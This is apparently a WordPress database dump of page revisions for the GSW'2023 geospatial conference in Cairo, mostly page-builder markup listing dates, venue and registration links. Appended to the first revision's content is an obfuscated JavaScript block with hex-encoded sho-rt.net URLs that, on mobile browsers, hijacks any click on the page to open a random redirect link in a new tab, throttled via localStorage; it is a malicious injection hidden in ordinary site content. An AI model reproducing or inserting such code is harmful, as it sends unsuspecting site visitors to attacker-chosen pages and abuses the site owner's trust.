color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_fancytext fancytext_prefix=\"GSW2023 Venue\" fancytext_align=\"left\" strings_textspeed=\"35\" strings_backspeed=\"0\" typewriter_loop=\"off\" typewriter_cursor=\"off\" fancytext_strings=\"GSW2023 Venue\" fancytext_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 20:15:56','2022-11-09 20:15:56','',3066,'https://gsw2023.com/?p=3211',0,'revision','',0),
(3212,1,'2022-11-09 20:19:59','2022-11-09 20:19:59','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h2 style=\"text-align: justify; color: #311b92;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668024005657{margin-top: 25px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_align=\"left\" title_size=\"h3\" title_color=\"accent\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" 